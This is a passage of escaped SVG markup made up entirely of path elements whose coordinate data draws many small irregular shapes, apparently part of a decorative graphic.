d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path 